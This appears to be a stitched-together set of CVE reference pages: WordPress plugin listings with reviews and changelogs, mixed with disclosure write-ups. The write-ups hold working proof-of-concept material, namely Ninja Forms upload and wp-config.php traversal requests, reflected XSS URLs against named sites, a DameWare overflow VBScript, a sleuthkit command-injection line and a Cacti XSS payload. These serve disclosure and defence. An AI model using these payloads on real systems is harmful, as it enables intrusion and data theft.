The WP Booking System plugin 1.5.1 for WordPress has no CSRF protection, which allows attackers to reach certain SQL injection issues that require administrative access.

*   Details
*   Reviews
*   Installation
*   Development

The booking calendar plugin for WordPress. WP Booking System is used by more than 9,000 active users, with a satisfaction rate that borders on 5\*!

Is this booking calendar for you?

*   Do you rent something out, like a holiday home, a boat or something else?
*   Do you have a WordPress website and need a bit of help to keep track of your rentals through a booking calendar?

…then yes! The WP Booking System is perfect for your needs.

Get easy online booking with this lightweight and powerful booking system.

**A set-and-forget booking calendar for your rental business**

WP Booking System is a simple booking calendar for WordPress. You will be up and running in just a few minutes. You can create booking calendars and forms, and you can manage your bookings. You can easily customize the booking calendar to fit your needs.

Start receiving bookings from your visitors today!

**Display available dates in your booking calendar**

With just one click you can create the first booking calendar for your holiday home or rental business. Already have bookings made? You can manually manage the calendar’s availability in just a few seconds.

Now your booking calendar is up to date with the latest bookings and available dates!

**Create a form and enable clients to make bookings online**

The beauty of this WordPress booking calendar is that it allows your website visitors to book available calendar dates on the spot through a fully customizable booking calendar form.

Enable your clients to use the rental calendar fast and easy. In just three simple steps, clients will be able to reserve a slot on your booking calendar:

*   Hover over the booking calendar to pick a starting date. Click on it, then move the cursor to select the number of days to book. (clients can easily see booked days by using the booking system legend)
*   Next, fill in the booking system form (you can edit the form fields at any time to make sure clients submit the most relevant information you need; mark fields as compulsory or optional)
*   Finally, click the booking button to make a reservation.

With the premium version of the booking system, you can allow customers to make online bookings using the top payment platforms available at the moment!

> Click here to see a demo of the premium version

You can review and manage calendar bookings from the back-end, so you are always in control. You can even set up automatic calendar notifications so you will receive an email when a booking is made. Now you’re all set to receive online bookings through your booking calendar.

**Receive and manage bookings**

All your bookings are saved in your rental calendar and are beautifully displayed so you can easily access them and view the booking details.

**No time to read the description? Discover the top benefits of WP Booking System in just 40 seconds!**

**Features of the Free version:**

*   Create your own booking system: a booking calendar and a booking form!
*   Receive and manage bookings
*   Save extra booking information
*   Generate a shortcode to insert the booking calendar and booking form into a page or post
*   Use the Gutenberg block to embed the booking calendar
*   WP Booking System Widget
*   The booking calendar supports multiple languages

**EXTRA FEATURES OF THE PREMIUM BOOKING CALENDAR VERSION:**

*   The booking system can accept online and offline payments
*   iCalendar Sync, Import and Export
*   Create an unlimited number of booking calendars
*   Create an unlimited number of booking forms
*   Create your own rental calendar legend: apply your own colors and text
*   Split days selection
*   Display multiple months
*   Change the first day of the week
*   Change the start month / year
*   Display an overview reservation calendar
*   Edit multiple dates with just one click
*   Display tooltips with extra info
*   Hide calendar bookings from the past from your visitors
*   Set the minimum number of days that the visitor must book
*   Show the week’s number on the booking calendar
*   Automatically block booked days directly
*   Send booking notifications
*   User management within the booking system
*   Very easy to translate into any language
*   Professional support for any question related to the booking calendar
*   Download the Premium version at: www.wpbookingsystem.com

**This WP Booking Calendar Plugin is for…**

Any rental business should use the WP Booking Calendar plugin to keep track of their rental calendar throughout the year.

*   Property rentals: bed & breakfast, hotels, hotel rooms, cottages, apartments, houses, apartment rooms (use WP Booking System even when you are renting through AirBNB, Booking.com etc.)
*   Boat rentals
*   Car & motorcycle rentals
*   Sports equipment rentals (full day ski equipment rental, bike rentals, skates rentals etc)
*   Events rentals (full day trainings/courses, parties, weddings, baptisms, corporate events, business meetings, conferences etc)
*   Speakers, singers, photographers, videographers, inspectors can also benefit from using WP Booking system

The booking system will soon become an indispensable tool in your business, and you will find yourself using it daily to manage reservations in your calendar.

**How the booking calendar helps your clients**

*   Clients can make calendar bookings online, by accessing your website
*   No need to call to make a reservation
*   They can see the available calendar dates and manage their schedule to make a booking
*   They can make simple and fast bookings from the comfort of their own home, directly from their mobile phones

**Key booking system benefits for your business**

*   Collect relevant information about your clients through the booking system form (configure the rental calendar form to your needs). No need to call or collect this information at the desk.
*   Use the WP Booking System on the go, from your mobile phone. The WP Booking Calendar can be used from mobile devices with ease – simply log in to your website and make any necessary edits just like on a computer.
*   Manage bookings offline – when you meet with a client 1:1 and they want to make a future booking, simply log in to your website, access the booking calendar and make the reservation on the spot, for them.
*   Stay up to date with calendar bookings by receiving email confirmations and reminders

**WP Booking System in a nutshell…**

Get organised and start receiving bookings with WP booking system. With this WP plugin you can create booking calendars, booking forms and accept bookings via your website. Setting it up is really easy and you will be up and running in just a few minutes. Bookings will be clearly listed in your booking calendar and you can stay organised. The booking calendar plugin works simply and it can be translated into several languages.

This plugin provides 1 block.

*   WP Booking System - Booking Calendar

1.  Install the plugin by uploading the zip file (Plugins > Add New > Upload)
2.  Activate the plugin through the ‘Plugins’ menu in WordPress
3.  Click on the ‘WP Booking System’ menu entry
4.  Click on ‘Add New’ at the top of the page to create a calendar
5.  To embed a calendar on a page or post, use the ‘Add Calendar’ button at that page

**How can I embed the booking calendar on a page or post?**

By using the ‘Add Calendar’ button above the editor, the Gutenberg module, a widget, or directly by using the shortcode. An example of the shortcode is:

    [wpbs id="1" title="yes/no" legend="yes/no" language="auto" form_id="1"]
    

**Will this booking system work for me?**

We’re pretty sure about that! We made this plugin as ‘flexible’ as possible. The booking plugin works with bookings on a per day basis (no time slots). So if you rent something out on a daily basis, then the WP Booking System is a good choice.

**I have another question**

Please see www.wpbookingsystem.com for more information and ask your questions there!

Very good plugin, fits exactly to our needs. The most reactive an fastest support I have ever seen.

Great versatile plugin and the support is excellent.

When asking for an update to a Wordpress plugin you immediately think that you won't even get a reply but I was pleasantly surprised when Roland replied to my request saying that if they get time they will include my request.I thought that this would be the end of it but 2 weeks later when there was a plugin update, I noticed that my request had been considered and implemented.This makes my life so much easier when the people booking wish to change the boat they have booed and now that I can easily switch calendars without deleting and re entering all the details. Many thanks and special praise to the supporter named Roland!Lucien @ Ellerbeck Narrowboats

The support from Roland is fantastic, fast and in depth. I had a requirement for an additional function, Roland was back within an hour with it added to the Pro version. Can't recomment this plugi highly enough.

I installed this for our campsite bookings. I have tried a couple of other booking plugins but this is by far the best. Our requirement are straightforward: a single campsite that only takes one booking, but has variable nightly costs and optional additional campers. The plugin was perfect for this. Set up was a bit involved, but they all are like that. Configuration of things like notifications and payments was straightforward and clear. The Stripe integration is particularly good. I only have one criticism: when you configure manual acceptance of bookings, and then accept a booking, the relevant date statuses do not update automatically. This has to be done manually. However, I'm sure they will change that at some point. All in all a great plugin, well worth the fee and with really good support.

Plugin is working really well. Managing my bookings and syncing with bookin.com and AirBnB works like a charm. In the exceptional situation that I need some support, Roland is always available to help out. Perfect support.

Read all 248 reviews

“WP Booking System – Booking Calendar” is open source software. The following people have contributed to this plugin.

Contributors

*    Roland Murg

**2.0.18.1**

*   Improved: Security improvements

**2.0.18**

*   Fixed: Deprecated notice when activating the plugin

**2.0.17**

*   New: Added “Number” form field

**2.0.16**

*   Improved: Updated Elementor Widget

**2.0.15**

*   Improved: Security fix

**2.0.14**

*   New: Added Icelandinc Language
*   New: Added Chinese Language
*   New: Added Latvian Language
*   Improved: Compatibility with WP 5.6 and TwentyTwentyone theme

**2.0.13**

*   Fixed: Bug with reCAPTCHA key not being included.

**2.0.12**

*   New: Added Indonesian language
*   Fixed: An issue with calendar not being sized properly on page load.
*   Fixed: An issue that could cause reCAPTCHA not to validate on some server configurations.

**2.0.11**

*   Improved: Minified CSS and JS Files.
*   Improved: Removed Duplicate HTML IDs in form editor
*   Fixed: A jQuery error that appeared in some cases when editing the form

**2.0.10**

*   Fixed: Backend calendar is now displayed in the correct language set in WordPress.

**2.0.9**

*   Improved: Compatibility changes for the new WordPress 5.4
*   Improved: Calendar dynamic sizing when resizing the viewport

**2.0.8**

*   Fixed: Single date selection on mobile devices

**2.0.7**

*   New: Added Korean language
*   Improved: Changed translation file locations
*   Improved: Minified JS file
*   Fixed: CSS display issue for Email Tags
*   Fixed: Language codes for Slovenian and Swedish
*   Fixed: Changed Czech flag

**2.0.6**

*   Improved: Admin Layout changes to match WP 5.3

**2.0.5**

*   Fixed: Widget not allowing a calendar without a form
*   Fixed: Email not allowing HTML tags

**2.0.4**

*   Fixed: Translation of dates sent in emails
*   Fixed: iCalendar sync delay bug
*   Improved: Calendar date selection styling

**2.0.3**

*   Added: Chinese Language

**2.0.2**

*   Fixed: iPhone and iPad bug when selecting calendar dates

**2.0.1**

*   Fixed: Bug that caused some emails not to be sent.

**2.0.0**

*   Major Rebuild
*   New: Gutenberg Module
*   Improved: Calendar Editor
*   Improved: Form Builder
*   Improved: Booking Manager
*   Improved: Calendar front-end display

**1.5.2**

*   Fixed Deprecated widget constructor

**1.5.2**

*   Security Improvements

**1.5.1**

*   Fixed: Issue with hovering over calendar dates.

**1.5**

*   Added Bulgarian language
*   Fixed Mod\_Security new SQL Injection filter conflict

**1.4**

*   Added filters to sanitize user input to prevent cross-site scripting (XSS) and SQL injections. Thanks to JPCERT/CC for pointing us at this issue.

**1.3.3**

*   Fixed a small CSS issue regarding bulk edit

**1.3.2**

*   Fixed translation problem regarding form options (i.e. radio buttons)

**1.3.1**

*   The notification of unread bookings now disappears when you delete the related calendar

**1.3**

*   The admin panel is now fully responsive
*   Updated the Premium features list

**1.2.3**

*   Small tweak to support PHP 7

**1.2.2**

*   Hide notifications in the toolbar when the user does not have access to the corresponding page

**1.2.1**

*   Decode booking details before saving

**1.2**

*   Minor bug fixes

**1.1**

*   UTF-8 fix

**1.0**

*   Changed the version number to 1.0

**0.7**

*   Small CSS fixes and a language fix related to the widget

**0.6**

*   Second output buffer fix

**0.5**

*   Output buffer fix

**0.4**

*   Fix in booking details fields.
*   Update (elaboration): The booking notes (the content of the text fields near the editable dates in the admin panel) were shown in the source code of the page the calendar was displayed on (this content can also be indexed by Google). If you were vulnerable, your website and the booking notes may have been archived and exposed by https://archive.org, and possibly by other sites. Please ask them to delete your data if needed. Affected versions of the Free version: All versions lower than 0.4.

**0.3**

*   Minor fix

**0.2**

*   Small CSS fixes

**0.1**

*   First release

CVE-2019-12239: WP Booking System – Booking Calendar

Path Traversal and Unrestricted File Upload exists in the Ninja Forms plugin before 3.0.23 for WordPress (when the Uploads add-on is activated). This allows an attacker to traverse the file system to access files and execute code via the includes/fields/upload.php (aka upload/submit page) name and tmp_name parameters.

During a recent Pentest for one of our clients, we discovered Path Traversal and Unrestricted File Upload vulnerabilities in the WordPress plugin Ninja Forms with its File Upload extension (v3.0.22) enabled.

This eventually allows an unauthenticated attacker to traverse the file system to access files and execute code via the includes/fields/upload.php (aka upload/submit page) **name** and **tmp\_name** parameters.

**Initial file upload Request:**

POST /wp-admin/admin-ajax.php?action=nf\_fu\_upload HTTP/1.1
Host: testserver.com
Content-Type: multipart/form-data; boundary=---------------------------16345274557837
Content-Length: 522

-----------------------------16345274557837
Content-Disposition: form-data; name="form\_id"

1
-----------------------------16345274557837
Content-Disposition: form-data; name="field\_id"

5
-----------------------------16345274557837
Content-Disposition: form-data; name="nonce"

0f3a997174
-----------------------------16345274557837
Content-Disposition: form-data; name="files"; filename="test.png.doc"
Content-Type: application/msword

<?php phpinfo(); ?>
-----------------------------16345274557837--

**Response:**

HTTP/1.1 200 OK  
Server: nginx/1.14.0 

"data":{    
    "files":\[    
       {    
          "name":"test.png.doc",  
          "type":"application\\/msword",  
          "tmp\_name":"nftmp-14FpD-test.png.doc",  
          "error":0,  
          "size":19  
       }  
    \]  
 }

When the form is submitted the initially uploaded tmp file is moved to a new location:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: testserver.com  
Content-Length: 6850

\--snip--   
"5":{    
  "value":1,  
  "id":5,  
  "files":\[    
     {    
        "name":"test.(php)",  
        "tmp\_name":"nftmp-BNxfG-test.png.doc",  
        "fieldID":5  
     }  
  \]  
 --snip--

The parameter “name” is then “sanitized” by the WordPress function **sanitize\_file\_name**, which essentially only removes a set of predefined special characters:

ninja-forms-uploads/includes/fields/upload.php:124  
$file\_name = sanitize\_file\_name(basename($target\_file)); 

**sanitize\_file\_name**   
Removes special characters that are illegal in filenames    
on certain operating systems and special characters   
requiring special escaping to manipulate at the command line.   
Replaces spaces and consecutive dashes with a single dash.    
Trims period, dash and underscore from beginning and end of filename.    
It is not guaranteed that this function will return a filename   
that is allowed to be uploaded. 

https://developer.wordpress.org/reference/functions/sanitize\_file\_name/

This results in moving the tmp file to its final location:  
/**wp-content/uploads/ninja-forms/1/test.php**

If the upload folder has not been made non-executable explicitly, which is not the case by default, this results in code execution:

code execution

**Path Traversal in tmp\_name**

when submitting the form it is also possible to traverse the filesystem through the tmp\_name parameter as shown below. Keep in mind that tmp files are moved to their new location within the uploads folder!

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: testserver.com  
Content-Length: 6850

\--snip--   
"5":{    
  "value":1,  
  "id":5,  
  "files":\[    
     {    
        "name":"test.doc",  
        "tmp\_name":"../../../../wp-config.php",  
        "fieldID":5  
     }  
  \]  
 --snip--

This results in moving the wp-config.php file to the following location:  
**/wp-content/uploads/ninja-forms/1/test.doc**  

  

The vendor was informed and both vulnerabilities have been fixed in its most recent version (3.0.23). Updating the ninja-forms-uploads plugin is highly recommended! 

\# Exploit Title: Path Traversal and Unrestricted File Upload in Ninja Forms Uploads  
# Date: 05-04-2019  
# Exploit Author: Jasper Weijts, Onvio, https://www.onvio.nl/  
# Vendor Homepage: https://www.ninjaforms.com/  
# Version: <= 3.0.22  
# Tested on: Ubuntu 16 - nginx/1.14.0 - WordPress 5.1.1 - Firefox  
# CVE : CVE-2019-10869

CVE-2019-10869: Pentest reveals vulnerabilities in WordPress plugin Ninja Forms

DWRCC in SolarWinds DameWare Mini Remote Control 10.0 x64 has a Buffer Overflow associated with the size field for the machine name.

**Axioscloud Sissiweb Registro Elettronico - 'Error\_desc' Reflective Cross Site Script**

\# Date: 2018-10-11  
\# Vendor Homepage: http://axiositalia.it/  
\# Software Link: http://axiositalia.it/?page\_id=1907  
\# Version: 1.7.0/7.0.0  
\# Category: Webapps  
\# Platform: ASPX  
\# CVE-2018-18437  
\# POC:  
\# https://family.axioscloud.it/secret/relogoff.aspx?Error\_Desc=Sessione%20non%20Validaa%3Cbody%20onload=%22alert(%27ok%27);%22%3E&Error\_Parameters=

**Linguascope Language Learning Platform - 'Activity' Reflective Cross Site Script**

\# Date: 2018-11-24  
\# Vendor Homepage: https://www.linguascope.com  
\# Category: Webapps  
\# Platform: PHP  
\# POC:  
\# https://www.linguascope.com/secure/students/elementary/html5/bin/main.php?language=english&activity=%22/%3E%3Cscript%3Ealert(%27Hacked%27)%3C/script%3E%3C%22

**Dameware Mini Remote Control 10.0 - Buffer Overflow / Denial of Service CVE-2019-9017**

\# Date: 2019-02-22  
\# Vendor: Solarwinds  
\# Tested on: Windows 7 SP1 x64  
\# CVE ID: CVE-2019-9017  
\# POC in VB Script  
option explicit  
dim fold,exe,buf,i,wsh,fso,result  
exe = "DWRCC.exe"  
fold = "C:\\program files\\SolarWinds\\DameWare Mini Remote Control 10.0 x64 #1\\"  
for i = 0 to 300  
buf = buf & "A"  
next  
set wsh = createobject("wscript.shell")  
set fso = createobject("scripting.filesystemobject")  
if fso.folderexists(fold) then  
fold = fold & exe  
fold = chr(34) & fold & chr(34)  
result = wsh.run(fold & " -c: -h: -m:" & buf,0,true)  
end if

**OS Command injection vulnerability in sleuthkit fls tool CVE-2022-45639**

\# Date: 2023-01-20  
\# CVE-2022-45639  
\# Vendor Homepage: https://github.com/sleuthkit  
\# Vulnerability Type: Command injection  
\# Attack Type: Local  
\# Version: 4.11.1  
\# Authors: Dino Barlattani, Giuseppe Granato  
\# POC:

fls tool is affected by command injection in parameter "-m" when run on linux system.  
OS Command injection vulnerability in sleuthkit fls tool 4.11.1 allows attackers to execute arbitrary commands  
via a crafted value to the m parameter

when it run on linux, a user can insert in the -m parameter a buffer with backtick with a shell command.  
If it run with a web application as front end it can execute commands on the remote server.

The function affected by the vulnerability is "tsk\_fs\_fls()" from the "fls\_lib.c" file

#ifdef TSK\_WIN32  
   {  
   ....  
   }  
#else

   data.macpre = tpre; <---------------

   return tsk\_fs\_dir\_walk(fs, inode, flags, print\_dent\_act, &data);

#endif

Run command:

$ fls -m \`id\` \[Options\]

CVE-2019-9017: Binary World - Informazioni,Sicurezza informatica,Sorgenti e tanto altro...

This vulnerability relates to the user's browser processing of DUCC webpage input data.The javascript comprising Apache UIMA DUCC (<= 2.2.2) which runs in the user's browser does not sufficiently filter user supplied inputs, which may result in unintended execution of user supplied javascript code.

 ** Security Update List by CVEs**

> Here are the known Security Vulnerabilities for Apache UIMA, listed by CVE number.
> 
> *   CVE-2018-8035: Apache UIMA DUCC webserver cross-site scripting (XSS) vulnerability due to unintended execution of user supplied javascript code.
>     
>     Severity: Important
>     
>     Vendor:
>     The Apache Software Foundation
>     
>     Versions Affected:
>       - Apache UIMA DUCC releases including and prior to 2.2.2
>     
>     Description.
>     The details of this vulnerability were reported to the Apache UIMA Private mailing list.
>     
>     This  vulnerability relates to the user's browser processing of DUCC web page input data.
>     
>     The javascript comprising Apache UIMA DUCC which runs in the user's browser does not sufficiently filter user supplied inputs, which may result in unintended execution of user supplied javascript code.
>     
>     Mitigation:
>     Users are advised to upgrade these UIMA components to the following levels:
>       - Apache UIMA DUCC: upgrade to 3.0.0 or later
>     
>     Credit: Marshall Schor 
>     
> 
> *   CVE-2017-15691: Apache UIMA XML external entity expansion (XXE) attack exposure 
>     
>     Severity: Important  
>     
>     Vendor:
>     The Apache Software Foundation
>     
>     Versions Affected:
>       - uimaj 2.x.x releases prior to 2.10.2
>       - uimaj 3.0.0 releases prior to 3.0.0-beta
>       - uima-as releases prior to 2.10.2
>       - uimaFIT releases prior to 2.4.0
>       - uimaDUCC releases prior to 2.2.2
>     
>     Description.
>     The details of this vulnerability were reported to the Apache UIMA Private
>     mailing list.
>     
>     This  vulnerability relates to an XML external entity expansion (XXE) capability
>     of various XML parsers. See
>        https://www.owasp.org/index.php/XML\_External\_Entity\_(XXE)\_Processing
>     for more details.
>     
>     UIMA as part of its configuration and operation may read XML from various
>     sources, which could be tainted in ways to cause inadvertent disclosure of local
>     files or other internal content.
>     
>     Mitigation:
>     Users are advised to upgrade these UIMA components to the following levels or later:
>       - uimaj: 2.x.x upgrade to 2.10.2 or later
>       - uimaj: 3.x.x upgrade to 3.0.0 or later
>       - uima-as: upgrade to 2.10.2 or later
>       - uimaFIT: upgrade to 2.4.0 or later
>       - uimaDUCC: upgrade to 2.2.2 or later
>     
>     Credit: Joern Kottmann
>     

 ** Reporting New Security Problems with Apache UIMA**

> We strongly encourage people to report new security problems to the private security mailing list of the ASF Security Team, before disclosing them in a public forum.
> 
> Please see the page of the AFS Security Team for further information and contact information.
> 
> **The Security Team cannot accept regular bug reports or other queries; please use the regular UIMA mailing lists for those.**

 ** Security Standards**

> Apache UIMA vulnerabilities are labeled with CVE (Common Vulnerabilities and Exposures) identifiers.

Home

Privacy Policy

Copyright © 2006-2013, The Apache Software Foundation.  
Apache UIMA, UIMA, the Apache UIMA logo and the Apache Feather logo are trademarks of The Apache Software Foundation.  
All other marks mentioned may be trademarks or registered trademarks of their respective owners.

Contact us

CVE-2018-8035: Apache UIMA - Security Reports

The WebDorado Contact Form plugin before 1.13.5 for WordPress allows CSRF via the wp-admin/admin-ajax.php action parameter, with resultant local file inclusion via directory traversal, because there can be a discrepancy between the $_POST['action'] value and the $_GET['action'] value, and the latter is unsanitized.

*   Details
*   Reviews
*   Development

Create simple contact forms or complex applications with this FREE and intuitive WordPress plugin. No coding knowledge is required.

Very easy to set up and use!

Awesome features, high functionality.

I have had this problem more than once with this plugin. When they update the plugin, they change the short code without letting anyone know. The previous short code on the contact page of my website is then useless and I loose business because I never get the email. Next, I have had complaints from potential customers (between web-d updates) that they have to submit the captcha three or four times.

This plug-in gives you a great opportunity to get in contact with the visitors on your site. Easy to configure, and set up the fields like you want them.

I like this plugin, because it really helps make usable contact forms. The service is fast and competent.

Read all 156 reviews

“Contact Form by WD – responsive drag & drop contact form builder tool” is open source software. The following people have contributed to this plugin.

Contributors

CVE-2019-11591: Contact Form by WD – responsive drag & drop contact form builder tool

The WebDorado Contact Form Builder plugin before 1.0.69 for WordPress allows CSRF via the wp-admin/admin-ajax.php action parameter, with resultant local file inclusion via directory traversal, because there can be a discrepancy between the $_POST['action'] value and the $_GET['action'] value, and the latter is unsanitized.

*   Details
*   Reviews
*   Development

Create responsive FREE contact forms with multiple templates and themes.

Quick way to build a form without taking rocket science classes.

I have absolutely no complaints. It's taken me a bit to find my way around, but the program is working like a well-oiled engine.

Does the work, is configurable, works fine!

I've had the form on my website since launching it and it's been very helpful for us to collate and collect information.

thanks a lot for free use in this configuration. It works and good for individual Forms.

easy to use. simple and efficient.

Read all 186 reviews

“WDContactFormBuilder” is open source software. The following people have contributed to this plugin.

Contributors

*    webdorado

CVE-2019-11557: WDContactFormBuilder

In clearFilter() in utilities.php in Cacti before 1.2.3, no escaping occurs before printing out the value of the SNMP community string (SNMP Options) in the View poller cache, leading to XSS.

**Describe the bug**  
There's no escape being done before printing out the value of SNMP community string (SNMP Options) in the View poller cache.

**To Reproduce**  
Steps to reproduce the behavior:

1.  Login as normal user ( should have device creation explicitly enabled ).
    
2.  Select create a new device from the console menu.
    
3.  Enter the below shared payload into the "SNMP community string" field & save the device. Payload - <script> alert('XSS'); document.location.replace('//google.com');</script>\`
    
4.  Now login as an Admin user & go to Utilities > System utils > View poller cache, XSS would be trigerred & redirected to google.com as specified in the payload. .
    

**Expected behavior**  
Proper filtration & escaping needs to be done, before taking in the data from the user.

**Screenshots**  

**Desktop (please complete the following information):**

*   OS: Ubuntu 16.04
*   Browser: Firefox

**Smartphone (please complete the following information):**

**Additional context**  
Vulnerable snippet:

Line 1849 in utilities.php  
__('Community:') . ' ' . $item['snmp_community']

CVE-2019-11025: When viewing poller cache, Device SNMP community is not properly escaped · Issue #2581 · Cacti/cacti

application\admin\controller\User.php in ThinkAdmin V4.0 does not prevent continued use of an administrator's cookie-based credentials after a password change.

There is a authority control&Information Disclosure vulnerability inThinkAdmin v4.0.  
As admin,if you change your password,your cookie won't become invalid. And it won't become invalid until the end of Life Cycle.So if attackers got admin's cookie,though traces of the attackers were found,and admin change his password,but attackers still can enter the managed-system.  
POC:  
1:Supposed the attacker got admin's cookie.  

2:We use Edit\_this\_cookie to change cookie .  

3:Admin change his own password

4:We can see attackers still have access to this manage system.

I have analysised source code that result in this vulnerabilty.  
The problem present to ..\\application\\admin\\controller\\User.php

The original source code is:  
public function pass() { if ($this->request->isGet()) { $this->assign('verify', false); return $this->_form($this->table, 'pass'); } $post = $this->request->post(); if ($post['password'] !== $post['repassword']) { $this->error('两次输入的密码不一致！'); } $data = ['id' => $post['id'], 'password' => md5($post['password'])]; if (DataService::save($this->table, $data, 'id')) { $this->success('密码修改成功，下次请使用新密码登录！', ''); } $this->error('密码修改失败，请稍候再试！'); }

And for this,I have make a padding.  
    public function pass() { if ($this->request->isGet()) { $this->assign('verify', false); return $this->_form($this->table, 'pass'); } $post = $this->request->post(); if ($post['password'] !== $post['repassword']) { $this->error('两次输入的密码不一致！'); } $data = ['id' => $post['id'], 'password' => md5($post['password'])]; if (DataService::save($this->table, $data, 'id')) { /* $this->success('密码修改成功，下次请使用新密码登录！', '');*/ if (session('id')) { LogService::write('系统管理', '用户退出系统成功'); } session('id', null); session_destroy(); $this->success('修改成功，请重新登陆！', '@admin/login'); } $this->error('密码修改失败，请稍候再试！'); }

Author:schur happyhackingschur@gmail.com

CVE-2019-11018: ThinkAdmin V4.0 authority control&Information Disclosure  vulnerability · Issue #173 · zoujingli/ThinkAdmin

In the wp-google-maps plugin before 7.11.18 for WordPress, includes/class.rest-api.php in the REST API does not sanitize field names before a SELECT statement.

Tag

#php